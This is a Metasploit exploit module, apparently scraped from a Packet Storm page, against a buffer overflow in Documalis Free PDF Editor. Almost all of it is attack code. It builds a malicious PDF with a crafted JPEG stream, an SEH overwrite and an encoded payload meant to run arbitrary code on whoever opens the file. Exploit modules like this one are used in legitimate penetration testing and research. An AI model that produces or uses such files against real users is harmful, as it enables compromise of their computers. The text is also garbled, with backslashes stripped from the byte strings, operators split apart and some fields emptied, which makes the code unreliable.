Documalis Free PDF Editor Buffer Overflow ≈ Packet Storm
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::PDF
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Documalis Free PDF Editor',
'Description' => %q{Documalis Free PDF Editor is prone to a security vulnerability when open PDF files.When the application is used to open a specially crafted PDF file, a buffer overflow occurs allowing arbitrary code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom', # Vulnerability discovery and PoC
'
],
'References' =>
[
['EDB', ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process', # none/process/thread/seh
},
'Platform' => 'win',
'Payload' =>
{
'Space' => 2000,
'DisableNops' => true
},
'Targets' =>
[
['
{
'Ret' => 0x0040160D, # pop eax # pop ebx # ret - PDFEditor.exe
'Offset' => 433
}
]
],
'Privileged' => false,
'DisclosureDate' => 'May 22 2020',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
])
end
def exploit
file_create(make_pdf)
end
def jpeg
buffer = "xFFxD8xFFxEEx00x0Ex41x64x6Fx62x65x00x64x80x00x00"
buffer < < "x00x02xFFxDBx00x84x00x02x02x02x02x02x02x02x02x02"
buffer < < "x02x03x02x02x02x03x04x03x03x03x03x04x05x04x04x04"
buffer < < "x04x04x05x05x05x05x05x05x05x05x05x05x07x08x08x08"
buffer < < "x07x05x09x0Ax0Ax0Ax0Ax09x0Cx0Cx0Cx0Cx0Cx0Cx0Cx0C"
buffer < < "x0Cx0Cx0Cx0Cx0Cx0Cx0Cx01x03x02x02x03x03x03x07x05"
buffer < < "x05x07x0Dx0Ax09x0Ax0Dx0Fx0Dx0Dx0Dx0Dx0Fx0Fx0Cx0C"
buffer < < "x0Cx0Cx0Cx0Fx0Fx0Cx0Cx0Cx0Cx0Cx0Cx0Fx0Cx0Ex0Ex0E"
buffer < < "x0Ex0Ex0Cx11x11x11x11x11x11x11x11x11x11x11x11x11"
buffer < < "x11x11x11x11x11x11x11x11xFFxC0x00x14x08x00x32x00"
buffer < < "xE6x04x01x11x00x02x11x01x03x11x01x04x11x00xFFxC4"
buffer < < "x01xA2x00x00x00x07x01x01x01x01x01x00x00x00x00x00"
buffer < < "x00x00x00x04x05x03x02x06x01x00x07x08x09x0Ax0Bx01"
buffer < < "x54x02x02x03x01x01x01x01x01x00x00x00x00x00x00x00"
buffer < < "x01x00x02x03x04x05x06x07"
buffer < < rand_text(target['Offset']) # junk
buffer < < generate_seh_record(target.ret)
buffer < < payload.encoded
buffer < < rand_text(2388 - payload.encoded.length)
buffer
end
def make_pdf
@pdf < < header
add_object(1, "< >")
add_object(2, "< >")
add_object(3, "< >>>/MediaBox[0 0 612.0 792.0]>>")
add_object(4, "[/PDF/Text/ImageC]")
add_object(5, "< >")
stream_1 = "stream" < < eol
stream_1 < < "0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q" << eol
stream_1 < < "endstream" << eol
add_object(6, "< >#{stream_1}")
stream = "< <" << eol
stream < < "/Width 230" << eol
stream < < "/BitsPerComponent 8" << eol
stream < < "/Name /X" << eol
stream < < "/Height 50" << eol
stream < < "/Intent /RelativeColorimetric" << eol
stream < < "/Subtype /Image" << eol
stream < < "/Filter /DCTDecode" << eol
stream < < "/Length #{jpeg.length}" << eol
stream < < "/ColorSpace /DeviceCMYK" << eol
stream < < "/Type /XObject" << eol
stream < < ">>"
stream < < "stream" << eol
stream < < jpeg << eol
stream < < "endstream" << eol
add_object(7, stream)
finish_pdf
end
end
Gloss